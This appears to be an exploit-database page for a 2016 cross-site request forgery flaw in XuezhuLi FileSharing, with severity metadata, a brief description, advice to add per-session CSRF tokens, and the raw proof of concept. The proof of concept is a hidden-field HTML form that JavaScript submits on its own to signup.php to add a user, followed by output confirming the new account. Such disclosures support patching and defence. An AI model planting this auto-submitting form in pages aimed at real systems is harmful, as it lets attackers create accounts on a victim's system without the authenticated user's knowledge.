XuezhuLi FileSharing - CSRF(Add User)

vendor:

FileSharing

by:

HaHwul

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: FileSharing

Affected Version From: Latest commit

Affected Version To: Latest commit

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian [wheezy]

2016

XuezhuLi FileSharing – CSRF(Add User)

A CSRF vulnerability exists in XuezhuLi FileSharing, which allows an attacker to add a new user to the system without the user's knowledge or consent. An attacker can craft a malicious HTML page containing a form with hidden fields, which when visited by an authenticated user, will submit the form and add a new user to the system. This can be exploited by an attacker to gain access to the system.

Mitigation:

To mitigate CSRF attacks, the application should implement a CSRF token that is unique to each user session. This token should be included in all requests and verified by the server before processing the request.

Source

Exploit-DB raw data:

<!--	
# Exploit Title: XuezhuLi FileSharing - CSRF(Add User)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->

<form name="csrf_poc" action="http://127.0.0.1/vul_test/FileSharing/signup.php" method="POST">
<input type="hidden" name="sign" value="ok">
<input type="hidden" name="newuser" value="csrf_test">

<input type="submit" value="Replay!">
</form>

<script type="text/javascript">document.forms.csrf_poc.submit();</script>

<!--
Output.
#> cat /srv/userlists.txt 
aaaa
csrf_test

-->